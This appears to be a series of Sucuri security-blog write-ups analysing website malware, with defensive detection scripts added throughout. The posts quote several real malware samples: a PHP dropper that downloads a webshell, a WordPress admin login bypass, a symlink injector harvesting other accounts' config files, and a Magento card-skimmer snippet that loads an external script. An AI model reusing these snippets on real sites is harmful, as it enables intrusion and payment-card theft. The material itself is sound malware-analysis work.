Web shell downloader – simple attempt to avoid...

When dealing with compromised scenarios, our team has to be very thorough to remove all pieces of malware in the infected website. Most of the time attackers don’t inject single bits of code but a variety of malware to increase the chances of maintaining access to the compromised resource while reducing the chances of getting caught.


One of the techniques they use to increase those odds is injecting a file known as a Dropper that downloads the real malware into the system. The Dropper can go undetected for a long time because it usually doesn’t contain any obfuscated function, encoding, or anything that is malicious per se. Its sole purpose is to download the malware and write it into the system, as you can see in the snippet below:

<?php
if( $z = fopen( 'include4.php', 'w') ) {
    if( fwrite( $z, file_get_contents( 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php') ) ) {
        fclose( $z );
        echo '0';
    } else {
        echo '1';
    }
} else {
    echo '2';
}

If you are unfamiliar with PHP, don’t worry, the snippet is pretty straightforward. The Dropper tries to download the malware (webshell) using the function “file_get_contents()” and saves it into the file “include4.php”. If the operation succeeds, the number 0 is printed as the result of the request (the well-known exit code for successful command execution on UNIX systems). If it can’t download the webshell, it prints 1; if it can’t create the file in which the shell will reside, it prints 2.

The following code is the content of the webshell fetched by the Dropper from the 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php' link:

<?php
/*
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: ::
:: bm.php ::
:: BoffMax v1.0 Web Shell by The-C0de Team ::
....
<? eval(gzinflate(str_rot13(base64_decode('FJ3HjuPaklJ/
...

To protect and prevent these issues from happening, we highly recommend having a File Integrity Monitoring system in place, as well as adding a Web Application Firewall to block attacks against your website. If you suspect you are infected, or detect suspicious activities on your website, feel free to contact us at: https://sucuri.net

Malicious script injected to WordPress theme allowing Admin...

On a daily basis we find different kinds of malware like backdoors, credit card stealers, injected scripts, and phishing pages. While each one of those catches our attention, we recently found an interesting WordPress administration login bypass script.


This technique, login bypass, is often used after the website is compromised because attackers can easily access the post, page, and widget section without spending hours trying different username & password combinations in a brute-force attack, for instance.

The malicious script (theme.php) was injected into the theme structure with the intention of blending in with good code and trying to go undetected.

Here is a snippet of the malware:

require('./../../../../../../../wp-blog-header.php');
$query_str = "SELECT ID FROM $wpdb->users";
…
if (user_can($user_id, 'administrator')) {
    …
    $user_login = $user_info->user_login;
    …
    do_action('wp_login', $user_login);
    echo "You are logged in as $user_login";
    if (function_exists('get_admin_url')) {
        wp_redirect(get_admin_url());

The code is very straightforward. First, it includes the wp-blog-header.php file that subsequently loads functions from wp-config.php related to login capabilities.

Secondly, the malware checks whether the user ID fetched from the database has administrator privileges, runs the wp_login action for that user and looks up the ‘wp-admin’ URL via the ‘get_admin_url()’ function. If all these criteria match, the attacker is redirected (wp_redirect) to the wp-admin URL with administrator access to the backend without sending any username / password combination.

In these types of attacks, we also noticed that bogus admin users may be created in the backend interface. If you suspect a compromise, or identify a user with administrator privileges that you haven’t created, we highly recommend taking a backup of your database, removing the user and changing the password for all other users.
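The advice above (find administrator accounts you never created) can be checked directly against the same tables the bypass script queried. The following is an added example, not code from the post or from WordPress: it reads wp_users and wp_usermeta, decodes the PHP-serialized wp_capabilities value to recover role names, and lists every administrator that is not on an owner-supplied allowlist. It runs against an in-memory SQLite copy with constructed rows; the table prefix wp_, the user names and the allowlist are assumptions for the demo.

```python
"""List WordPress administrators and flag unexpected ones (added example, not Sucuri code)."""
import re
import sqlite3

# A role switched on in wp_capabilities looks like  s:13:"administrator";b:1;
ROLE_RE = re.compile(r's:\d+:"([^"]+)";b:1;')


def roles_from_capabilities(serialized):
    """Role names set to true in a PHP-serialized wp_capabilities value,
    e.g. 'a:1:{s:13:"administrator";b:1;}' -> ['administrator']."""
    return ROLE_RE.findall(serialized or "")


def make_sample_db():
    """Constructed wp_users / wp_usermeta rows: a legitimate admin, an editor,
    and an administrator account the owner never created."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
        INSERT INTO wp_users VALUES (1, 'siteowner', '2014-01-10 09:00:00');
        INSERT INTO wp_users VALUES (2, 'writer',    '2014-03-02 12:00:00');
        INSERT INTO wp_users VALUES (3, 'wp_update', '2015-06-30 03:14:00');
        INSERT INTO wp_usermeta VALUES (1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
        INSERT INTO wp_usermeta VALUES (2, 'wp_capabilities', 'a:1:{s:6:"editor";b:1;}');
        INSERT INTO wp_usermeta VALUES (3, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
    """)
    return conn


def list_admins(conn, prefix="wp_"):
    """(ID, user_login, user_registered) for every account holding the administrator role."""
    rows = conn.execute(
        f"SELECT u.ID, u.user_login, u.user_registered, m.meta_value "
        f"FROM {prefix}users u JOIN {prefix}usermeta m ON m.user_id = u.ID "
        f"WHERE m.meta_key = ? ORDER BY u.ID",
        (f"{prefix}capabilities",),
    ).fetchall()
    return [(uid, login, registered) for uid, login, registered, caps in rows
            if "administrator" in roles_from_capabilities(caps)]


def unexpected_admins(conn, known_admins, prefix="wp_"):
    """Administrator logins that are not in the owner's allowlist."""
    return [login for _uid, login, _reg in list_admins(conn, prefix)
            if login not in known_admins]


if __name__ == "__main__":
    db = make_sample_db()
    for uid, login, registered in list_admins(db):
        print(f"admin #{uid}: {login} (registered {registered})")
    print("unexpected:", unexpected_admins(db, {"siteowner"}))
```

Against a live site, point sqlite3 at a dump converted for SQLite or swap the connection for a MySQL driver; the query and the capability parsing are the same. Registration dates help too: an administrator created after the last legitimate onboarding deserves a look even if the name seems plausible.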

As a good security practice, users should have access only to the resources they need, and WordPress implements this well through the different roles a user can have in the backend (Subscriber, Editor, Contributor, Author, Administrator, etc.). Make sure to take advantage of this feature and prevent further damage to your website and online presence.

We also recommend having a File Integrity Monitor in place and a Website Firewall to prevent further issues from happening.

Malicious JavaScript Injected in Plugin Widget

Each and every day the attackers get more clever and exploit new attack vectors. Sucuri Labs recently found malicious JavaScript hidden in the database of a WordPress website.


The malicious code was injected inside a legitimate widget of the website:

s:6:"filter";b:1;}i:6;a:3:{s:5:"title";s:0:"";s:4:"text";s:515:"<?php$r=$_SERVER[base64_decode('SFRUUF9SRUZFUkVS')]; $h=$_SERVER[base64_decode('U0VSVkVSX05BTUU=')]; $s=base64_decode('PHNjcmlwdCBzcmM9Imh0dHAclVmIj48L3ND4NCg=='); $p = strpos($r, $h); if(($p===false)&&($r<>'')){echo $s;}if(current_user_can('administrator') || current_user_can('editor') || current_user_can('author') || current_user_can('contributor')) {?>

No heavy encoding or obfuscation was used for this attack, just simple base64 encoding. After decoding the strings, we found that it loads a malicious jQuery-lookalike JavaScript file from a shortened URL:

<script src="hxxp://g00(.)co/P4YrUf"></script>

which redirects to this free JavaScript hosting site:

hxxp://yourjavascript(.)com/5123133466/jquery-migrate-min-g4.js

which injects spammy iframes inside the widget.

If you think that you are a victim of such an attack, check your database for the above base64-encoded strings, update all of your plugins, and check all of your widgets for suspicious content. You can trust our Security Engineers at https://sucuri.net to check your website for more malicious code if you are unsure that the infection was cleared.
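A scan for the two injections discussed so far, the Dropper (a remote file_get_contents() whose result feeds a file write) and this widget payload (base64_decode() literals hiding $_SERVER keys and a <script> tag), comes down to a few patterns plus decoding the literals. The following is an added example, not Sucuri tooling and not code from the post: it decodes every base64_decode('...') literal it finds and reports the indicators. The sample sources are constructed from the snippets on the page, with example.invalid standing in for the real hosts, and the third base64 string in the widget sample is built in place rather than copied from the post.

```python
"""Static indicator scan for dropper and base64-hidden widget code (added example)."""
import base64
import binascii
import re

# Constructed sample: the page's dropper with the real host replaced.
DROPPER_SAMPLE = """<?php
if( $z = fopen( 'include4.php', 'w') ) {
    if( fwrite( $z, file_get_contents( 'http://example.invalid/priv8.php') ) ) {
        fclose( $z ); echo '0';
    } else { echo '1'; }
} else { echo '2'; }
"""

# Constructed sample: the widget PHP. The first two literals are the ones on the
# page (they decode to HTTP_REFERER and SERVER_NAME); the script tag is built here.
_SCRIPT_TAG = base64.b64encode(b'<script src="http://example.invalid/x.js"></script>').decode()
WIDGET_SAMPLE = (
    "<?php $r=$_SERVER[base64_decode('SFRUUF9SRUZFUkVS')]; "
    "$h=$_SERVER[base64_decode('U0VSVkVSX05BTUU=')]; "
    f"$s=base64_decode('{_SCRIPT_TAG}'); "
    "$p = strpos($r, $h); if(($p===false)&&($r<>'')){echo $s;} ?>"
)

# Constructed sample of the eval(gzinflate(str_rot13(base64_decode(...)))) shell loader.
EVAL_SAMPLE = "<?php eval(gzinflate(str_rot13(base64_decode('AAAA')))); ?>"

B64_CALL = re.compile(r"""base64_decode\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
REMOTE_FETCH = re.compile(r"""file_get_contents\(\s*['"]https?://""", re.I)
WRITE_CALL = re.compile(r"\b(fwrite|file_put_contents)\s*\(")
EVAL_DECODED = re.compile(r"\beval\s*\(\s*(gzinflate|str_rot13|base64_decode|gzuncompress)\s*\(")
SERVER_LOOKUP = re.compile(r"\$_SERVER\[\s*base64_decode\(")


def find_base64_literals(src):
    """(encoded, decoded-text) pairs for every base64_decode('...') literal in src."""
    out = []
    for enc in B64_CALL.findall(src):
        try:
            raw = base64.b64decode(enc, validate=True)
        except binascii.Error:
            continue
        out.append((enc, raw.decode("utf-8", "replace")))
    return out


def scan_source(src):
    """List of {'rule', 'detail'} findings for one PHP source string."""
    findings = []
    if REMOTE_FETCH.search(src) and WRITE_CALL.search(src):
        findings.append({"rule": "remote-fetch-to-file",
                         "detail": "file_get_contents() of a remote URL feeds a file write"})
    m = EVAL_DECODED.search(src)
    if m:
        findings.append({"rule": "eval-of-decoded", "detail": m.group(0)})
    if SERVER_LOOKUP.search(src):
        findings.append({"rule": "server-var-lookup",
                         "detail": "$_SERVER key hidden behind base64_decode()"})
    for _enc, dec in find_base64_literals(src):
        if "<script" in dec.lower():
            findings.append({"rule": "hidden-script-tag", "detail": dec})
    return findings


if __name__ == "__main__":
    for name, sample in [("dropper", DROPPER_SAMPLE), ("widget", WIDGET_SAMPLE), ("eval", EVAL_SAMPLE)]:
        for f in scan_source(sample):
            print(f"{name}: {f['rule']}: {f['detail']}")
```

Decoding the widget's literals also explains its targeting: the script tag is printed only when the referrer is non-empty and does not contain the site's own hostname, i.e. to visitors arriving from elsewhere, which is why the owner browsing their own site never sees it. Feed widget text from a database dump (the wp_options rows holding widget data) and theme files through scan_source() alike.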

Image defacement hides content from search engines

Website defacement is still a big issue for many website owners. It directly impacts your online presence / visibility and, as a consequence, it may get your website flagged as “Hacked” by different search engines.


Recently, our team found an interesting case where the defacement page was not just an HTML page. This type of defacement used a different technique that makes it harder to detect and harder for a search engine to identify such pages as dangerous resources.

As many of you know, images are not part of the text and metadata that search engines read in order to index your website. If you don’t have a file monitoring system in place, you may never identify the issue unless you visit the defaced resource yourself or receive a message from a visitor / client.

The following snippet is an example of the technique being used by attackers:

<html>
    <body>
        <?php $image_url='url/to/the/defaced/image'; ?>
        <img src="<?php echo $image_url;?>">
    </body>
</html>

Beware that attackers may use different techniques to deface a website. This one, however, is hidden from the search engines. The issue may only be detected if you are constantly monitoring your website or have Website Firewall Protection in place to prevent it from happening.

If you think that you are victim of an attack and want your website checked, you can rely on the security analyst professionals here at Sucuri.

Multiple UNIX users symbolic link injector

Recently we found a very interesting malware that injects symbolic links in each and every Linux/UNIX home folder. Once the website is infected, it uses the following code to avoid detection from search engine agents and can be executed only by the attackers:

if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    $bot = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if (preg_match('/' . implode('|', $bot) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}


The malicious code also performs other checks, such as verifying if the OS is Windows (as it may not work on that OS due to filesystem differences) and if the symlink function is enabled on the PHP engine:

if ($_POST["m"] && !$_POST["passwd"] == "") {
    $check = @ini_get("disable_functions");
    if (eregi("symlink", $check)) {
        die("<font color=13B8E6>Symlink is Disbled</font>");
    }

If the following conditions are met:

  • the User-Agent does not match one of the listed search engine bots;
  • the OS is Linux/UNIX based;
  • the PHP engine has the symlink function enabled;

the malware injects code into the .htaccess file to change your DirectoryIndex to Sux.html, which usually redirects to a defacement page.

Moreover, the attacker also has the capability of sending different $_POST requests in an attempt to find the location of the /etc/passwd file.

$etc_passwd = $_POST["passwd"];
$etc_passwd = explode("\n", $etc_passwd);
foreach ($etc_passwd as $passwd) {
    $pawd = explode(":", $passwd);
    $user = $pawd[0];

This technique is used because, if the infected server sits in a shared environment and the attackers can reach the other users’ directories, they can inject multiple symlinks pointing into different users’ accounts and collect as many database configuration files and sensitive data as they can:

@symlink('/home/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
@symlink('/home/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
@symlink('/home/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');

If you don’t use symlinks, our recommendation would be disabling the PHP symlink function altogether (the script itself checks disable_functions for it) - this way the script is ineffective. Also check the /home directory on your hosting for directories that are not known to you, plus for files and folders that are not part of your website.
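The two checks recommended above can be automated: confirm that PHP's disable_functions lists symlink, and walk an account's tree for symbolic links whose target resolves outside that account. The following is an added example, not Sucuri code or the post's: the demo builds two constructed accounts under a temporary directory, plants a link of the shape the injector creates (alice's public_html/bob-shop.txt pointing at bob's configure.php) next to a harmless in-account link, and reports only the cross-account one. The account names, paths and the disable_functions strings are assumptions for the demo.

```python
"""Find symlinks that escape a hosting account, and check disable_functions (added example)."""
import os
import tempfile


def symlink_disabled(disable_functions):
    """True when PHP's disable_functions ini value (comma separated) lists symlink."""
    return "symlink" in {name.strip() for name in disable_functions.split(",")}


def foreign_symlinks(account_root):
    """(relative link path, resolved target) for every symlink under account_root
    whose target resolves outside account_root. Links are not followed, so a
    planted directory link cannot drag the walk into another account."""
    root = os.path.realpath(account_root)
    found = []
    for dirpath, dirs, files in os.walk(account_root):
        for name in dirs + files:
            link = os.path.join(dirpath, name)
            if not os.path.islink(link):
                continue
            target = os.path.realpath(link)
            if os.path.commonpath([root, target]) != root:
                found.append((os.path.relpath(link, account_root).replace(os.sep, "/"), target))
    return sorted(found)


def demo():
    """Constructed /home layout with two accounts; returns alice's foreign links and bob's config path."""
    home = tempfile.mkdtemp()
    alice = os.path.join(home, "alice")
    bob = os.path.join(home, "bob")
    os.makedirs(os.path.join(alice, "public_html"))
    os.makedirs(os.path.join(bob, "public_html", "includes"))

    bob_config = os.path.join(bob, "public_html", "includes", "configure.php")
    with open(bob_config, "w") as f:
        f.write("<?php // bob's database settings (constructed) ?>")

    # The injector's pattern: a .txt link inside alice's web root pointing at bob's config.
    os.symlink(bob_config, os.path.join(alice, "public_html", "bob-shop.txt"))
    # A benign link that stays inside alice's own account.
    os.symlink(os.path.join(alice, "public_html"), os.path.join(alice, "www"))

    return foreign_symlinks(alice), os.path.realpath(bob_config)


if __name__ == "__main__":
    links, _ = demo()
    for rel, target in links:
        print(f"{rel} -> {target}")
    print("symlink disabled:", symlink_disabled("exec,symlink,shell_exec"))
```

Run foreign_symlinks() over each directory under /home from a privileged account; on a shared host a .txt file in a web root that resolves to another account's configure.php is the injector's output and also evidence that the server lets one account read another's files.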

If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.

Mage.js CC Stealer. The Database Version.

Every day we find many Magento credit card stealers injected into different files: modules, core files, themes. The Magento database is no exception.

For example, this credit card stealer was found in the core_config_data table. The obfuscated database injection begins with the following code:


<script>var _0x7539=["\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x65\x73\x74","\x6F\x6E\x65\x70\x61\x67\x65\x7C\x63\x68\x65...\x6F\x6E\x65\x73\x74\x65\x70\x7C\x66\x69\x72\x65\x63\x68\x65\x63\x6B\x6F\x75\x74"...

It loads an external script from js-save .link/js-save/mage.js into pages with payment forms to intercept data entered there.

var _0x7539=["location","test","onepage|checkout|onestep|firecheckout","<script src="https://js-save .link/js-save/mage.js"></script>...

The mage.js code sends intercepted data to the mag.php script on the same malicious js-save .link site.

The injected script has one more part (also encrypted). It prepares the payment form for data theft. Here is the decoded second part of the DB injection:

setInterval(function() {
    if (!document.getElementById("payment_form_ccsave")) {
        ShowForm("checkout-payment-method-load")
    }
}, 100);
function ShowForm(elem) {
    if (document.getElementById(elem)) {
        var node = document.getElementById(elem);
        while (node.firstChild) {
            node.removeChild(node.firstChild)
        };
        node.insertAdjacentHTML("beforeend", htmlCCForm)
    }
}

This code checks if the payment form has the “pay with credit card” method. If it is absent, it adds this method (and the corresponding hardcoded HTML form) to the “checkout-payment-method-load" page element and removes all other payment methods to increase chances of victims choosing to enter their credit card details in the form. Once the form is prepared, the script from js-save .link will be able to successfully steal entered data.

This attack is a new version of the attacks that previously used the js/lib/ccard.js file to inject similar scripts (usually not obfuscated). Back then they used the jquery-cdn . top and statsdot. eu domains.

Since this attack modifies the payment form, some infected sites may experience problems with payments. If your customers report that the payment form doesn’t work or behaves strangely, it may be a sign of infection and you need to thoroughly check all files and the database. Pay special attention to files like app/code/core/Mage/Payment/Model/Method/Cc.php and js/lib/ccard.js, and to the design/head/includes rows of the core_config_data table. You might also want to check the Ecommerce Security section of our blog where we regularly share details of attacks on ecommerce sites.
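Checking the core_config_data rows mentioned above can be scripted: the database flavour of this stealer shows up as hex-escaped JavaScript string arrays ("\x6C\x6F\x63..." for "location") and as <script src> tags pointing at hosts the shop does not own. The following is an added example, not Sucuri code: it decodes the escapes, extracts script hosts and flags both indicators. The rows are constructed (a normal stylesheet include, the hex array, an external script, and a script from the shop's own host), and the example.invalid hostnames stand in for the real ones.

```python
"""Scan core_config_data values for hex-escaped JS and external script hosts (added example)."""
import re
from urllib.parse import urlparse

HEX_ESC = re.compile(r"\\x([0-9A-Fa-f]{2})")                       # matches \x6C and friends
SCRIPT_SRC = re.compile(r"""<script[^>]*\ssrc\s*=\s*["']([^"']+)["']""", re.I)


def unescape_hex(s):
    # Turns the \xNN escapes used by the obfuscated array back into readable text.
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)


def external_script_hosts(markup, own_hosts):
    """Hostnames of <script src=...> tags not in own_hosts; relative srcs count as local."""
    hosts = []
    for src in SCRIPT_SRC.findall(unescape_hex(markup)):
        host = urlparse(src).hostname          # handles https:// and protocol-relative // URLs
        if host and host.lower() not in own_hosts:
            hosts.append(host.lower())
    return hosts


def scan_config(rows, own_hosts):
    """rows: (path, scope_id, value) tuples as read from core_config_data."""
    findings = []
    for path, scope_id, value in rows:
        if len(HEX_ESC.findall(value)) >= 4:     # a handful of escapes is the obfuscator's signature
            findings.append({"path": path, "scope_id": scope_id,
                             "reason": "hex-escaped string array",
                             "decoded": unescape_hex(value)[:80]})
        for host in external_script_hosts(value, own_hosts):
            findings.append({"path": path, "scope_id": scope_id,
                             "reason": f"external script from {host}"})
    return findings


# Constructed rows; js-save.example.invalid stands in for the real stealer host.
SAMPLE_ROWS = [
    ("design/head/includes", 0,
     '<link rel="stylesheet" href="/skin/frontend/base/default/css/styles.css"/>'),
    ("design/head/includes", 1,
     r'<script>var _0x7539=["\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x65\x73\x74"];</script>'),
    ("design/head/includes", 2,
     '<script src="https://js-save.example.invalid/js-save/mage.js"></script>'),
    ("design/footer/absolute_footer", 0,
     '<script src="//shop.example.invalid/js/prototype/prototype.js"></script>'),
]


if __name__ == "__main__":
    for f in scan_config(SAMPLE_ROWS, {"shop.example.invalid"}):
        print(f"{f['path']} (scope {f['scope_id']}): {f['reason']}")
```

Pull the rows with a query such as SELECT path, scope_id, value FROM core_config_data WHERE path LIKE 'design/%' and pass them in; the own_hosts set should list every hostname the store legitimately serves scripts from, including any CDN.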

If your site is hacked and you need help in cleaning it, or you just want it to be regularly monitored for all sorts of security problems, make sure to check our Website AntiVirus service.

Speeding up indexing of SPAM files via sitemap.xml

Remember the wave of HTML file infections back in 2015 affecting outdated WordPress sites? Now it is back, more powerful, with more files uploaded via a PHP backdoor.

We found a large number of newly created folders in the root folder of a website.

The naming convention of the SPAM files was different from the previous infections, and the uploader backdoor script was located in the wp-content folder.

The obfuscation had this string:

eval(fUUPd("jbvnzvTQep53AAZ8Dhs7BiKFjlmGFYISsAx772QUCKzD3nuQYw8/SY71x95+AWJAcnGVZz...

where fUUPd was a custom decryption function based on gzinflate/base64_decode and character code shift.

function fUUPd($NVAR) {
    $NVAR = gzinflate(base64_decode($NVAR));
    for ($i = 0; $i < strlen($NVAR); $i++) {
        $NVAR[$i] = chr(ord($NVAR[$i]) - 1);
    }
    return $NVAR;
}

After decoding, it was easy to recognize the most popular WSO/FilesMan web shell.
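Decoding a blob wrapped by fUUPd() outside of PHP is a three-step job: base64 decode, raw DEFLATE inflate (PHP's gzinflate), then shift every byte down by one. The following is an added example, not Sucuri code or the malware's: a Python port of the decoder, an inverse encoder used only to build a constructed test blob (the attacker's encoder is not on the page), and a cheap marker check for the WSO/FilesMan family the post names. The sample payload text is constructed.

```python
"""Port of the fUUPd() unwrapping routine for offline analysis (added example)."""
import base64
import zlib


def fuupd_decode(blob):
    """base64 -> raw DEFLATE inflate -> every byte minus one (wrapping like PHP's chr())."""
    raw = zlib.decompress(base64.b64decode(blob), wbits=-zlib.MAX_WBITS)
    return bytes((b - 1) % 256 for b in raw)


def fuupd_encode(data):
    """Inverse of fuupd_decode; exists here only to build a test sample."""
    shifted = bytes((b + 1) % 256 for b in data)
    comp = zlib.compressobj(level=9, wbits=-zlib.MAX_WBITS)   # raw DEFLATE, as gzinflate expects
    return base64.b64encode(comp.compress(shifted) + comp.flush()).decode("ascii")


def looks_like_wso(decoded):
    """True if the unwrapped code carries markers of the WSO/FilesMan shell family."""
    text = decoded.decode("latin-1")
    return any(marker in text for marker in ("FilesMan", "WSO"))


# Constructed sample payload; stands in for the shell the post decoded.
SAMPLE_PLAIN = b"<?php echo 'constructed sample payload'; ?>"
SAMPLE_BLOB = fuupd_encode(SAMPLE_PLAIN)


if __name__ == "__main__":
    print("blob:", SAMPLE_BLOB)
    out = fuupd_decode(SAMPLE_BLOB)
    print("decoded:", out.decode("latin-1"))
    print("WSO markers:", looks_like_wso(out))
```

To analyse a real sample, paste the base64 string from inside eval(fUUPd("...")) into fuupd_decode(); the result is ordinary PHP that can be read, grepped for markers and hashed for an IoC list without ever executing it.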

The interesting part was the sitemap.xml files in all SPAM folders, which clearly sped up indexing of the malicious pages in popular search engines.

Keep an eye on your Search Console reports and notifications - you may find early signs of the compromise there. Act before it's too late and Google places an embarrassing "This site may be hacked" label on your search results. Website security monitoring will help you stay on top of things.